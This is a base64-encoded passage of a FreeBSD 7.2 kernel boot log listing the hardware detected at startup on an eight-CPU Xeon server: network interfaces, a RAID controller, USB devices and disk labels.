YykgMTk3OSwgMTk4MCwgMTk4MywgMTk4NiwgMTk4OCwgMTk4OSwgMTk5MSwgMTk5MiwgMTk5Mywg MTk5NA0KICAgICAgIFRoZSBSZWdlbnRzIG9mIHRoZSBVbml2ZXJzaXR5IG9mIENhbGlmb3JuaWEu IEFsbCByaWdodHMgcmVzZXJ2ZWQuDQpGcmVlQlNEIGlzIGEgcmVnaXN0ZXJlZCB0cmFkZW1hcmsg b2YgVGhlIEZyZWVCU0QgRm91bmRhdGlvbi4NCkZyZWVCU0QgNy4yLVJFTEVBU0UgIzE6IFR1ZSBK dW4gMjMgMTE6MDQ6MDYgRUVTVCAyMDA5DQogICByb290QGphaWxvbGQudmlrby5sdDovdXNyL3Ny Yy9zeXMvYW1kNjQvY29tcGlsZS9KQUlMMw0KV0FSTklORzogV0lUTkVTUyBvcHRpb24gZW5hYmxl ZCwgZXhwZWN0IHJlZHVjZWQgcGVyZm9ybWFuY2UuDQpUaW1lY291bnRlciAiaTgyNTQiIGZyZXF1 ZW5jeSAxMTkzMTgyIEh6IHF1YWxpdHkgMA0KQ1BVOiBJbnRlbChSKSBYZW9uKFIpIENQVSAgICAg ICAgICAgWDU0NjAgIEAgMy4xNkdIeiAoMzE3MS40MC1NSHogSzgtY2xhc3MgQ1BVKQ0KIE9yaWdp biA9ICJHZW51aW5lSW50ZWwiICBJZCA9IDB4MTA2NzYgIFN0ZXBwaW5nID0gNg0KIEZlYXR1cmVz PTB4YmZlYmZiZmY8RlBVLFZNRSxERSxQU0UsVFNDLE1TUixQQUUsTUNFLENYOCxBUElDLFNFUCxN VFJSLFBHRSxNQ0EsQ01PVixQQVQsUFNFMzYsQ0xGTFVTSCxEVFMsQUNQSSxNTVgsRlhTUixTU0Us U1NFMixTUyxIVFQsVE0sUEJFPg0KIEZlYXR1cmVzMj0weGNlM2JkPFNTRTMsUlNWRDIsTU9OLERT X0NQTCxWTVgsRVNULFRNMixTU1NFMyxDWDE2LHhUUFIsUERDTSxEQ0EsPGIxOT4+DQogQU1EIEZl YXR1cmVzPTB4MjAxMDA4MDA8U1lTQ0FMTCxOWCxMTT4NCiBBTUQgRmVhdHVyZXMyPTB4MTxMQUhG Pg0KIENvcmVzIHBlciBwYWNrYWdlOiA0DQp1c2FibGUgbWVtb3J5ID0gMTcxNjU1MjA4OTYgKDE2 MzcwIE1CKQ0KYXZhaWwgbWVtb3J5ICA9IDE2NjIyNjk0NDAwICgxNTg1MiBNQikNCkFDUEkgQVBJ QyBUYWJsZTogPEEgTSBJICBPRU1BUElDID4NCkZyZWVCU0QvU01QOiBNdWx0aXByb2Nlc3NvciBT eXN0ZW0gRGV0ZWN0ZWQ6IDggQ1BVcw0KIGNwdTAgKEJTUCk6IEFQSUMgSUQ6ICAwDQogY3B1MSAo QVApOiBBUElDIElEOiAgMQ0KIGNwdTIgKEFQKTogQVBJQyBJRDogIDINCiBjcHUzIChBUCk6IEFQ SUMgSUQ6ICAzDQogY3B1NCAoQVApOiBBUElDIElEOiAgNA0KIGNwdTUgKEFQKTogQVBJQyBJRDog IDUNCiBjcHU2IChBUCk6IEFQSUMgSUQ6ICA2DQogY3B1NyAoQVApOiBBUElDIElEOiAgNw0KaW9h cGljMCA8VmVyc2lvbiAyLjA+IGlycXMgMC0yMyBvbiBtb3RoZXJib2FyZA0KaW9hcGljMSA8VmVy c2lvbiAyLjA+IGlycXMgMjQtNDcgb24gbW90aGVyYm9hcmQNCmtiZDEgYXQga2JkbXV4MA0KYWNw aTA6IDxBIE0gSSBPRU1YU0RUPiBvbiBtb3RoZXJib2FyZA0KYWNwaTA6IFtJVEhSRUFEXQ0KYWNw aTA6IFBvd2VyIEJ1dHRvbiAoZml4ZWQpDQphY3BpMDogcmVzZXJ2YXRpb24gb2YgMCwgYTAwMDAg KDMpIGZhaWxlZA0KYWNwaTA6IHJlc2VydmF0aW9uIG9mIDEwMDAwMCwgZGZmMDAwMDAgKDMpIGZh aWxlZA0KVGltZWNvdW50ZXIgIkFDUEktZmFzdCIgZnJlcXVlbmN5IDM1Nzk1NDUgSHogcXVhbGl0 eSAxMDAwDQphY3BpX3RpbWVyMDogPDI0LWJpdCB0aW1lciBhdCAzLjU3OTU0NU1Iej4gcG9ydCAw eDQwOC0weDQwYiBvbiBhY3BpMA0KYWNwaV9ocGV0MDogPEhpZ2ggUHJlY2lzaW9uIEV2ZW50IFRp bWVyPiBpb21lbSAweGZlZDAwMDAwLTB4ZmVkMDAzZmYgb24gYWNwaTANClRpbWVjb3VudGVyICJI UEVUIiBmcmVxdWVuY3kgMTQzMTgxODAgSHogcXVhbGl0eSA5MDANCnBjaWIwOiA8QUNQSSBIb3N0 LVBDSSBicmlkZ2U+IHBvcnQgMHhjZjgtMHhjZmYgb24gYWNwaTANCnBjaTA6IDxBQ1BJIFBDSSBi dXM+IG9uIHBjaWIwDQpwY2liMTogPEFDUEkgUENJLVBDSSBicmlkZ2U+IGF0IGRldmljZSAyLjAg b24gcGNpMA0KcGNpMTogPEFDUEkgUENJIGJ1cz4gb24gcGNpYjENCnBjaWIyOiA8QUNQSSBQQ0kt UENJIGJyaWRnZT4gaXJxIDE2IGF0IGRldmljZSAwLjAgb24gcGNpMQ0KcGNpMjogPEFDUEkgUENJ IGJ1cz4gb24gcGNpYjINCnBjaWIzOiA8QUNQSSBQQ0ktUENJIGJyaWRnZT4gYXQgZGV2aWNlIDAu MCBvbiBwY2kyDQpwY2kzOiA8QUNQSSBQQ0kgYnVzPiBvbiBwY2liMw0KcGNpYjQ6IDxBQ1BJIFBD SS1QQ0kgYnJpZGdlPiBhdCBkZXZpY2UgMi4wIG9uIHBjaTINCnBjaTQ6IDxBQ1BJIFBDSSBidXM+ IG9uIHBjaWI0DQplbTA6IDxJbnRlbChSKSBQUk8vMTAwMCBOZXR3b3JrIENvbm5lY3Rpb24gNi45 LjY+IHBvcnQgMHg5YzAwLTB4OWMxZiBtZW0gMHhmYzZlMDAwMC0weGZjNmZmZmZmIGlycSAxOCBh dCBkZXZpY2UgMC4wIG9uIHBjaTQNCmVtMDogVXNpbmcgTVNJIGludGVycnVwdA0KZW0wOiBbRklM VEVSXQ0KZW0wOiBFdGhlcm5ldCBhZGRyZXNzOiAwMDoxZTo2ODoyZTpmZjo4OA0KZW0xOiA8SW50 ZWwoUikgUFJPLzEwMDAgTmV0d29yayBDb25uZWN0aW9uIDYuOS42PiBwb3J0IDB4OTgwMC0weDk4 MWYgbWVtIDB4ZmM2YzAwMDAtMHhmYzZkZmZmZiBpcnEgMTkgYXQgZGV2aWNlIDAuMSBvbiBwY2k0 DQplbTE6IFVzaW5nIE1TSSBpbnRlcnJ1cHQNCmVtMTogW0ZJTFRFUl0NCmVtMTogRXRoZXJuZXQg YWRkcmVzczogMDA6MWU6Njg6MmU6ZmY6ODkNCnBjaWI1OiA8UENJLVBDSSBicmlkZ2U+IGF0IGRl dmljZSAwLjMgb24gcGNpMQ0KcGNpNTogPFBDSSBidXM+IG9uIHBjaWI1DQpwY2liNjogPEFDUEkg UENJLVBDSSBicmlkZ2U+IGF0IGRldmljZSAzLjAgb24gcGNpMA0KcGNpNjogPEFDUEkgUENJIGJ1 cz4gb24gcGNpYjYNCnBjaWI3OiA8QUNQSSBQQ0ktUENJIGJyaWRnZT4gYXQgZGV2aWNlIDQuMCBv biBwY2kwDQpwY2k3OiA8QUNQSSBQQ0kgYnVzPiBvbiBwY2liNw0KYWFjMDogPFNHLVhQQ0lFU0FT LVItSU4+IG1lbSAweGZjYTAwMDAwLTB4ZmNiZmZmZmYgaXJxIDE3IGF0IGRldmljZSAwLjAgb24g cGNpNw0KYWFjMDogRW5hYmxpbmcgNjQtYml0IGFkZHJlc3Mgc3VwcG9ydA0KYWFjMDogRW5hYmxl IFJhdyBJL08NCmFhYzA6IEVuYWJsZSA2NC1iaXQgYXJyYXkNCmFhYzA6IE5ldyBjb21tLiBpbnRl cmZhY2UgZW5hYmxlZA0KYWFjMDogW0lUSFJFQURdDQphYWMwOiBTdW4gU1RLIFJBSUQgSU5ULCBh YWMgZHJpdmVyIDIuMC4wLTENCmFhY3AwOiA8U0NTSSBQYXNzdGhyb3VnaCBCdXM+IG9uIGFhYzAN CmFhY3AxOiA8U0NTSSBQYXNzdGhyb3VnaCBCdXM+IG9uIGFhYzANCmFhY3AyOiA8U0NTSSBQYXNz dGhyb3VnaCBCdXM+IG9uIGFhYzANCnBjaWI4OiA8QUNQSSBQQ0ktUENJIGJyaWRnZT4gYXQgZGV2 aWNlIDUuMCBvbiBwY2kwDQpwY2k4OiA8QUNQSSBQQ0kgYnVzPiBvbiBwY2liOA0KcGNpYjk6IDxB Q1BJIFBDSS1QQ0kgYnJpZGdlPiBhdCBkZXZpY2UgNi4wIG9uIHBjaTANCnBjaTk6IDxBQ1BJIFBD SSBidXM+IG9uIHBjaWI5DQpwY2liMTA6IDxBQ1BJIFBDSS1QQ0kgYnJpZGdlPiBhdCBkZXZpY2Ug Ny4wIG9uIHBjaTANCnBjaTEwOiA8QUNQSSBQQ0kgYnVzPiBvbiBwY2liMTANCnBjaWIxMTogPEFD UEkgUENJLVBDSSBicmlkZ2U+IGlycSAxNyBhdCBkZXZpY2UgMjguMCBvbiBwY2kwDQpwY2kxMTog PEFDUEkgUENJIGJ1cz4gb24gcGNpYjExDQplbTI6IDxJbnRlbChSKSBQUk8vMTAwMCBOZXR3b3Jr IENvbm5lY3Rpb24gNi45LjY+IHBvcnQgMHhhYzAwLTB4YWMxZiBtZW0gMHhmY2RlMDAwMC0weGZj ZGZmZmZmLDB4ZmNkYzAwMDAtMHhmY2RkZmZmZiBpcnEgMTYgYXQgZGV2aWNlIDAuMCBvbiBwY2kx MQ0KZW0yOiBVc2luZyBNU0kgaW50ZXJydXB0DQplbTI6IFtGSUxURVJdDQplbTI6IEV0aGVybmV0 IGFkZHJlc3M6IDAwOjFlOjY4OjJlOmZmOjhhDQplbTM6IDxJbnRlbChSKSBQUk8vMTAwMCBOZXR3 b3JrIENvbm5lY3Rpb24gNi45LjY+IHBvcnQgMHhhODAwLTB4YTgxZiBtZW0gMHhmY2Q4MDAwMC0w eGZjZDlmZmZmLDB4ZmNkNjAwMDAtMHhmY2Q3ZmZmZiBpcnEgMTcgYXQgZGV2aWNlIDAuMSBvbiBw Y2kxMQ0KZW0zOiBVc2luZyBNU0kgaW50ZXJydXB0DQplbTM6IFtGSUxURVJdDQplbTM6IEV0aGVy bmV0IGFkZHJlc3M6IDAwOjFlOjY4OjJlOmZmOjhiDQp1aGNpMDogPEludGVsIDYzMVhFU0IvNjMy WEVTQi8zMTAwIFVTQiBjb250cm9sbGVyIFVTQi0xPiBwb3J0IDB4ZDgwMC0weGQ4MWYgaXJxIDIy IGF0IGRldmljZSAyOS4wIG9uIHBjaTANCnVoY2kwOiBbR0lBTlQtTE9DS0VEXQ0KdWhjaTA6IFtJ VEhSRUFEXQ0KdXNiMDogPEludGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAwIFVTQiBjb250cm9sbGVy IFVTQi0xPiBvbiB1aGNpMA0KdXNiMDogVVNCIHJldmlzaW9uIDEuMA0KdWh1YjA6IDxJbnRlbCBV SENJIHJvb3QgaHViLCBjbGFzcyA5LzAsIHJldiAxLjAwLzEuMDAsIGFkZHIgMT4gb24gdXNiMA0K dWh1YjA6IDIgcG9ydHMgd2l0aCAyIHJlbW92YWJsZSwgc2VsZiBwb3dlcmVkDQp1aGNpMTogPElu dGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAwIFVTQiBjb250cm9sbGVyIFVTQi0yPiBwb3J0IDB4ZDQw MC0weGQ0MWYgaXJxIDIzIGF0IGRldmljZSAyOS4xIG9uIHBjaTANCnVoY2kxOiBbR0lBTlQtTE9D S0VEXQ0KdWhjaTE6IFtJVEhSRUFEXQ0KdXNiMTogPEludGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAw IFVTQiBjb250cm9sbGVyIFVTQi0yPiBvbiB1aGNpMQ0KdXNiMTogVVNCIHJldmlzaW9uIDEuMA0K dWh1YjE6IDxJbnRlbCBVSENJIHJvb3QgaHViLCBjbGFzcyA5LzAsIHJldiAxLjAwLzEuMDAsIGFk ZHIgMT4gb24gdXNiMQ0KdWh1YjE6IDIgcG9ydHMgd2l0aCAyIHJlbW92YWJsZSwgc2VsZiBwb3dl cmVkDQp1aGNpMjogPEludGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAwIFVTQiBjb250cm9sbGVyIFVT Qi0zPiBwb3J0IDB4ZDAwMC0weGQwMWYgaXJxIDIwIGF0IGRldmljZSAyOS4yIG9uIHBjaTANCnVo Y2kyOiBbR0lBTlQtTE9DS0VEXQ0KdWhjaTI6IFtJVEhSRUFEXQ0KdXNiMjogPEludGVsIDYzMVhF U0IvNjMyWEVTQi8zMTAwIFVTQiBjb250cm9sbGVyIFVTQi0zPiBvbiB1aGNpMg0KdXNiMjogVVNC IHJldmlzaW9uIDEuMA0KdWh1YjI6IDxJbnRlbCBVSENJIHJvb3QgaHViLCBjbGFzcyA5LzAsIHJl diAxLjAwLzEuMDAsIGFkZHIgMT4gb24gdXNiMg0KdWh1YjI6IDIgcG9ydHMgd2l0aCAyIHJlbW92 YWJsZSwgc2VsZiBwb3dlcmVkDQp1aGNpMzogPEludGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAwIFVT QiBjb250cm9sbGVyIFVTQi00PiBwb3J0IDB4Y2MwMC0weGNjMWYgaXJxIDIxIGF0IGRldmljZSAy OS4zIG9uIHBjaTANCnVoY2kzOiBbR0lBTlQtTE9DS0VEXQ0KdWhjaTM6IFtJVEhSRUFEXQ0KdXNi MzogPEludGVsIDYzMVhFU0IvNjMyWEVTQi8zMTAwIFVTQiBjb250cm9sbGVyIFVTQi00PiBvbiB1 aGNpMw0KdXNiMzogVVNCIHJldmlzaW9uIDEuMA0KdWh1YjM6IDxJbnRlbCBVSENJIHJvb3QgaHVi LCBjbGFzcyA5LzAsIHJldiAxLjAwLzEuMDAsIGFkZHIgMT4gb24gdXNiMw0KdWh1YjM6IDIgcG9y dHMgd2l0aCAyIHJlbW92YWJsZSwgc2VsZiBwb3dlcmVkDQplaGNpMDogPEludGVsIDYzWFhFU0Ig VVNCIDIuMCBjb250cm9sbGVyPiBtZW0gMHhmZGZmYjgwMC0weGZkZmZiYmZmIGlycSAyMiBhdCBk ZXZpY2UgMjkuNyBvbiBwY2kwDQplaGNpMDogW0dJQU5ULUxPQ0tFRF0NCmVoY2kwOiBbSVRIUkVB RF0NCnVzYjQ6IEVIQ0kgdmVyc2lvbiAxLjANCnVzYjQ6IGNvbXBhbmlvbiBjb250cm9sbGVycywg MiBwb3J0cyBlYWNoOiB1c2IwIHVzYjEgdXNiMiB1c2IzDQp1c2I0OiA8SW50ZWwgNjNYWEVTQiBV U0IgMi4wIGNvbnRyb2xsZXI+IG9uIGVoY2kwDQp1c2I0OiBVU0IgcmV2aXNpb24gMi4wDQp1aHVi NDogPEludGVsIEVIQ0kgcm9vdCBodWIsIGNsYXNzIDkvMCwgcmV2IDIuMDAvMS4wMCwgYWRkciAx PiBvbiB1c2I0DQp1aHViNDogOCBwb3J0cyB3aXRoIDggcmVtb3ZhYmxlLCBzZWxmIHBvd2VyZWQN CnVtYXNzMDogPFRleGFzIEluc3RydW1lbnRzIEluY29ycG9yYXRlZCA2MjUwIEZXOiAwMy4wNS4w Mi4yMi41NjJBRDQyMywgY2xhc3MgMC8wLCByZXYgMi4wMC8yLjAwLCBhZGRyIDI+IG9uIHVodWI0 DQp1aHViNTogPHZlbmRvciAweDA0YjQgcHJvZHVjdCAweDY1NjAsIGNsYXNzIDkvMCwgcmV2IDIu MDAvMC4wYiwgYWRkciAzPiBvbiB1aHViNA0KdWh1YjU6IG11bHRpcGxlIHRyYW5zYWN0aW9uIHRy YW5zbGF0b3JzDQp1aHViNTogNCBwb3J0cyB3aXRoIDQgcmVtb3ZhYmxlLCBzZWxmIHBvd2VyZWQN CnVodWI2OiA8dmVuZG9yIDB4MDQzMCBwcm9kdWN0IDB4MTAwZSwgY2xhc3MgOS8wLCByZXYgMi4w MC8xLjA0LCBhZGRyIDQ+IG9uIHVodWI1DQp1aHViNjogNCBwb3J0cyB3aXRoIDMgcmVtb3ZhYmxl LCBidXMgcG93ZXJlZA0KdW1zMDogPHZlbmRvciAweDA1NjYgVVNCIE1vdXNlLCBjbGFzcyAwLzAs IHJldiAxLjEwLzUxLjI3LCBhZGRyIDU+IG9uIHVodWI2DQp1bXMwOiAzIGJ1dHRvbnMgYW5kIFog ZGlyLg0KdWtiZDA6IDx2ZW5kb3IgMHgwNDMwIFN1biBVU0IgS2V5Ym9hcmQsIGNsYXNzIDAvMCwg cmV2IDIuMDAvMS4wNCwgYWRkciA2PiBvbiB1aHViNg0Ka2JkMiBhdCB1a2JkMA0KcGNpYjEyOiA8 QUNQSSBQQ0ktUENJIGJyaWRnZT4gYXQgZGV2aWNlIDMwLjAgb24gcGNpMA0KcGNpMTI6IDxBQ1BJ IFBDSSBidXM+IG9uIHBjaWIxMg0KdmdhcGNpMDogPFZHQS1jb21wYXRpYmxlIGRpc3BsYXk+IHBv cnQgMHhiYzAwLTB4YmM3ZiBtZW0gMHhmZDAwMDAwMC0weGZkN2ZmZmZmLDB4ZmRlZTAwMDAtMHhm ZGVmZmZmZiBpcnEgMTYgYXQgZGV2aWNlIDUuMCBvbiBwY2kxMg0KaXNhYjA6IDxQQ0ktSVNBIGJy aWRnZT4gYXQgZGV2aWNlIDMxLjAgb24gcGNpMA0KaXNhMDogPElTQSBidXM+IG9uIGlzYWIwDQph dGFwY2kwOiA8SW50ZWwgNjNYWEVTQjIgVURNQTEwMCBjb250cm9sbGVyPiBwb3J0IDB4MWYwLTB4 MWY3LDB4M2Y2LDB4MTcwLTB4MTc3LDB4Mzc2IGF0IGRldmljZSAzMS4xIG9uIHBjaTANCmF0YTA6 IDxBVEEgY2hhbm5lbCAwPiBvbiBhdGFwY2kwDQphdGEwOiBbSVRIUkVBRF0NCmF0YXBjaTE6IDxJ bnRlbCBBSENJIGNvbnRyb2xsZXI+IHBvcnQgMHhlYzAwLTB4ZWMwNywweGU4MDAtMHhlODAzLDB4 ZTQwMC0weGU0MDcsMHhlMDAwLTB4ZTAwMywweGRjMDAtMHhkYzFmIG1lbSAweGZkZmZiYzAwLTB4 ZmRmZmJmZmYgaXJxIDIxIGF0IGRldmljZSAzMS4yIG9uIHBjaTANCmF0YXBjaTE6IFtJVEhSRUFE XQ0KYXRhcGNpMTogQUhDSSBWZXJzaW9uIDAxLjEwIGNvbnRyb2xsZXIgd2l0aCA2IHBvcnRzIGRl dGVjdGVkDQphdGEyOiA8QVRBIGNoYW5uZWwgMD4gb24gYXRhcGNpMQ0KYXRhMjogW0lUSFJFQURd DQphdGEzOiA8QVRBIGNoYW5uZWwgMT4gb24gYXRhcGNpMQ0KYXRhMzogW0lUSFJFQURdDQphdGE0 OiA8QVRBIGNoYW5uZWwgMj4gb24gYXRhcGNpMQ0KYXRhNDogW0lUSFJFQURdDQphdGE1OiA8QVRB IGNoYW5uZWwgMz4gb24gYXRhcGNpMQ0KYXRhNTogW0lUSFJFQURdDQphdGE2OiA8QVRBIGNoYW5u ZWwgND4gb24gYXRhcGNpMQ0KYXRhNjogW0lUSFJFQURdDQphdGE3OiA8QVRBIGNoYW5uZWwgNT4g b24gYXRhcGNpMQ0KYXRhNzogW0lUSFJFQURdDQpwY2kwOiA8c2VyaWFsIGJ1cywgU01CdXM+IGF0 IGRldmljZSAzMS4zIChubyBkcml2ZXIgYXR0YWNoZWQpDQphY3BpX2J1dHRvbjA6IDxQb3dlciBC dXR0b24+IG9uIGFjcGkwDQpzaW8wOiBjb25maWd1cmVkIGlycSAzIG5vdCBpbiBiaXRtYXAgb2Yg cHJvYmVkIGlycXMgMA0Kc2lvMDogcG9ydCBtYXkgbm90IGJlIGVuYWJsZWQNCnNpbzA6IGNvbmZp Z3VyZWQgaXJxIDMgbm90IGluIGJpdG1hcCBvZiBwcm9iZWQgaXJxcyAwDQpzaW8wOiBwb3J0IG1h eSBub3QgYmUgZW5hYmxlZA0Kc2lvMDogPDE2NTUwQS1jb21wYXRpYmxlIENPTSBwb3J0PiBwb3J0 IDB4MmY4LTB4MmZmIGlycSAzIGZsYWdzIDB4MTAgb24gYWNwaTANCnNpbzA6IHR5cGUgMTY1NTBB DQpzaW8wOiBbRklMVEVSXQ0Kc2lvMTogY29uZmlndXJlZCBpcnEgNCBub3QgaW4gYml0bWFwIG9m IHByb2JlZCBpcnFzIDANCnNpbzE6IHBvcnQgbWF5IG5vdCBiZSBlbmFibGVkDQpzaW8xOiBjb25m aWd1cmVkIGlycSA0IG5vdCBpbiBiaXRtYXAgb2YgcHJvYmVkIGlycXMgMA0Kc2lvMTogcG9ydCBt YXkgbm90IGJlIGVuYWJsZWQNCnNpbzE6IDwxNjU1MEEtY29tcGF0aWJsZSBDT00gcG9ydD4gcG9y dCAweDNmOC0weDNmZiBpcnEgNCBvbiBhY3BpMA0Kc2lvMTogdHlwZSAxNjU1MEENCnNpbzE6IFtG SUxURVJdDQpjcHUwOiA8QUNQSSBDUFU+IG9uIGFjcGkwDQpBQ1BJIFdhcm5pbmcgKHRidXRpbHMt MDI0Myk6IEluY29ycmVjdCBjaGVja3N1bSBpbiB0YWJsZSBbT0VNQl0gLSAgQjksIHNob3VsZCBi ZSBCNiBbMjAwNzAzMjBdDQplc3QwOiBmYWlsZWQgdG8gZW5hYmxlIFNwZWVkU3RlcA0KcDR0Y2Mw OiA8Q1BVIEZyZXF1ZW5jeSBUaGVybWFsIENvbnRyb2w+IG9uIGNwdTANCmNwdTE6IDxBQ1BJIENQ VT4gb24gYWNwaTANCmVzdDE6IGZhaWxlZCB0byBlbmFibGUgU3BlZWRTdGVwDQpwNHRjYzE6IDxD UFUgRnJlcXVlbmN5IFRoZXJtYWwgQ29udHJvbD4gb24gY3B1MQ0KY3B1MjogPEFDUEkgQ1BVPiBv biBhY3BpMA0KZXN0MjogZmFpbGVkIHRvIGVuYWJsZSBTcGVlZFN0ZXANCnA0dGNjMjogPENQVSBG cmVxdWVuY3kgVGhlcm1hbCBDb250cm9sPiBvbiBjcHUyDQpjcHUzOiA8QUNQSSBDUFU+IG9uIGFj cGkwDQplc3QzOiBmYWlsZWQgdG8gZW5hYmxlIFNwZWVkU3RlcA0KcDR0Y2MzOiA8Q1BVIEZyZXF1 ZW5jeSBUaGVybWFsIENvbnRyb2w+IG9uIGNwdTMNCmNwdTQ6IDxBQ1BJIENQVT4gb24gYWNwaTAN CmVzdDQ6IGZhaWxlZCB0byBlbmFibGUgU3BlZWRTdGVwDQpwNHRjYzQ6IDxDUFUgRnJlcXVlbmN5 IFRoZXJtYWwgQ29udHJvbD4gb24gY3B1NA0KY3B1NTogPEFDUEkgQ1BVPiBvbiBhY3BpMA0KZXN0 NTogZmFpbGVkIHRvIGVuYWJsZSBTcGVlZFN0ZXANCnA0dGNjNTogPENQVSBGcmVxdWVuY3kgVGhl cm1hbCBDb250cm9sPiBvbiBjcHU1DQpjcHU2OiA8QUNQSSBDUFU+IG9uIGFjcGkwDQplc3Q2OiBm YWlsZWQgdG8gZW5hYmxlIFNwZWVkU3RlcA0KcDR0Y2M2OiA8Q1BVIEZyZXF1ZW5jeSBUaGVybWFs IENvbnRyb2w+IG9uIGNwdTYNCmNwdTc6IDxBQ1BJIENQVT4gb24gYWNwaTANCmVzdDc6IGZhaWxl ZCB0byBlbmFibGUgU3BlZWRTdGVwDQpwNHRjYzc6IDxDUFUgRnJlcXVlbmN5IFRoZXJtYWwgQ29u dHJvbD4gb24gY3B1Nw0Kb3JtMDogPElTQSBPcHRpb24gUk9Ncz4gYXQgaW9tZW0gMHhjMDAwMC0w eGM2N2ZmLDB4YzY4MDAtMHhjNzdmZiwweGM3ODAwLTB4Yzg3ZmYsMHhjODgwMC0weGNlN2ZmLDB4 Y2U4MDAtMHhjZjdmZiwweGQwODAwLTB4ZDE3ZmYgb24gaXNhMA0KYXRrYmRjMDogPEtleWJvYXJk IGNvbnRyb2xsZXIgKGk4MDQyKT4gYXQgcG9ydCAweDYwLDB4NjQgb24gaXNhMA0KYXRrYmQwOiA8 QVQgS2V5Ym9hcmQ+IGlycSAxIG9uIGF0a2JkYzANCmtiZDAgYXQgYXRrYmQwDQphdGtiZDA6IFtH SUFOVC1MT0NLRURdDQphdGtiZDA6IFtJVEhSRUFEXQ0KcHBjMDogY2Fubm90IHJlc2VydmUgSS9P IHBvcnQgcmFuZ2UNCnNjMDogPFN5c3RlbSBjb25zb2xlPiBhdCBmbGFncyAweDEwMCBvbiBpc2Ew DQpzYzA6IFZHQSA8MTYgdmlydHVhbCBjb25zb2xlcywgZmxhZ3M9MHgzMDA+DQp2Z2EwOiA8R2Vu ZXJpYyBJU0EgVkdBPiBhdCBwb3J0IDB4M2MwLTB4M2RmIGlvbWVtIDB4YTAwMDAtMHhiZmZmZiBv biBpc2EwDQp1a2JkMTogPFZJUlRVQUwgVVNCIE1VTFRJTUVESUEgS0VZQk9BUkQsIGNsYXNzIDAv MCwgcmV2IDEuMTAvMC4wMSwgYWRkciAyPiBvbiB1aHViMQ0Ka2JkMyBhdCB1a2JkMQ0KdW1zMTog PFZJUlRVQUwgVVNCIE1VTFRJTUVESUEgS0VZQk9BUkQsIGNsYXNzIDAvMCwgcmV2IDEuMTAvMC4w MSwgYWRkciAyPiBvbiB1aHViMQ0KdW1zMTogMyBidXR0b25zIGFuZCBaIGRpci4NClRpbWVjb3Vu dGVycyB0aWNrIGV2ZXJ5IDEuMDAwIG1zZWMNCmFhY2QwOiA8UkFJRCAwLzE+IG9uIGFhYzANCmFh Y2QwOiAyNzk4MDBNQiAoNTczMDMwNDAwIHNlY3RvcnMpDQpHRU9NX0xBQkVMOiBMYWJlbCBmb3Ig cHJvdmlkZXIgYWFjZDBzMWEgaXMgdWZzaWQvNDk2NTFkYmU0ZGFlMGIyZS4NCkdFT01fTEFCRUw6 IExhYmVsIGZvciBwcm92aWRlciBhYWNkMHMxZCBpcyB1ZnNpZC80OTY1MWRjYmUxNTgyNzk2Lg0K R0VPTV9MQUJFTDogTGFiZWwgZm9yIHByb3ZpZGVyIGFhY2QwczFlIGlzIHVmc2lkLzQ5NjUxZGM5 NzlmOWI0ODkuDQpHRU9NX0xBQkVMOiBMYWJlbCBmb3IgcHJvdmlkZXIgYWFjZDBzMWYgaXMgdWZz aWQvNDk2NTFkYzlmMzVkY2RjZi4NCkdFT01fTEFCRUw6IExhYmVsIGZvciBwcm92aWRlciBhYWNk MHMxZyBpcyB1ZnNpZC80OTY1MWRiZTViMmU2ODdmLg0KKHByb2JlODYxOnVtYXNzLXNpbTA6MDow OjApOiBURVNUIFVOSVQgUkVBRFkuIENEQjogMCAwIDAgMCAwIDANCihwcm9iZTg2MTp1bWFzcy1z aW0wOjA6MDowKTogQ0FNIFN0YXR1czogU0NTSSBTdGF0dXMgRXJyb3INCihwcm9iZTg2MTp1bWFz cy1zaW0wOjA6MDowKTogU0NTSSBTdGF0dXM6IENoZWNrIENvbmRpdGlvbg0KKHByb2JlODYxOnVt YXNzLXNpbTA6MDowOjApOiBOT1QgUkVBRFkgYXNjOjNhLDINCihwcm9iZTg2MTp1bWFzcy1zaW0w OjA6MDowKTogTWVkaXVtIG5vdCBwcmVzZW50IC0gdHJheSBvcGVuDQoocHJvYmU4NjE6dW1hc3Mt c2ltMDowOjA6MCk6IFVucmV0cnlhYmxlIGVycm9yDQpzZXMwIGF0IGFhY3AyIGJ1cyAwIHRhcmdl dCAwIGx1biAwDQpzZXMwOiA8QURBUFRFQyBWaXJ0dWFsIFNHUElPICAwIDAwMDE+IEZpeGVkIEVu Y2xvc3VyZSBTZXJ2aWNlcyBTQ1NJLTUgZGV2aWNlDQpzZXMwOiAzLjMwME1CL3MgdHJhbnNmZXJz DQpzZXMwOiBTQ1NJLTMgU0VTIERldmljZQ0Kc2VzMSBhdCBhYWNwMiBidXMgMCB0YXJnZXQgMSBs dW4gMA0Kc2VzMTogPEFEQVBURUMgVmlydHVhbCBTR1BJTyAgMSAwMDAxPiBGaXhlZCBFbmNsb3N1 cmUgU2VydmljZXMgU0NTSS01IGRldmljZQ0Kc2VzMTogMy4zMDBNQi9zIHRyYW5zZmVycw0Kc2Vz MTogU0NTSS0zIFNFUyBEZXZpY2UNClNNUDogQVAgQ1BVICMxIExhdW5jaGVkIQ0KU01QOiBBUCBD UFUgIzIgTGF1bmNoZWQhDQpTTVA6IEFQIENQVSAjMyBMYXVuY2hlZCENClNNUDogQVAgQ1BVICM1 IExhdW5jaGVkIQ0KU01QOiBBUCBDUFUgIzQgTGF1bmNoZWQhDQpTTVA6IEFQIENQVSAjNyBMYXVu Y2hlZCENClNNUDogQVAgQ1BVICM2IExhdW5jaGVkIQ0KV0FSTklORzogV0lUTkVTUyBvcHRpb24g ZW5hYmxlZCwgZXhwZWN0IHJlZHVjZWQgcGVyZm9ybWFuY2UuDQpjZDAgYXQgdW1hc3Mtc2ltMCBi dXMgMCB0YXJnZXQgMCBsdW4gMA0KY2QwOiA8VFNTVGNvcnAgQ0QvRFZEVyBUUy1UNjMyQSBTUjAz PiBSZW1vdmFibGUgQ0QtUk9NIFNDU0ktMCBkZXZpY2UNCmNkMDogNDAuMDAwTUIvcyB0cmFuc2Zl cnMNCmNkMDogQXR0ZW1wdCB0byBxdWVyeSBkZXZpY2Ugc2l6ZSBmYWlsZWQ6IE5PVCBSRUFEWSwg TWVkaXVtIG5vdCBwcmVzZW50IC0gdHJheSBvcGVuDQpUcnlpbmcgdG8gbW91bnQgcm9vdCBmcm9t 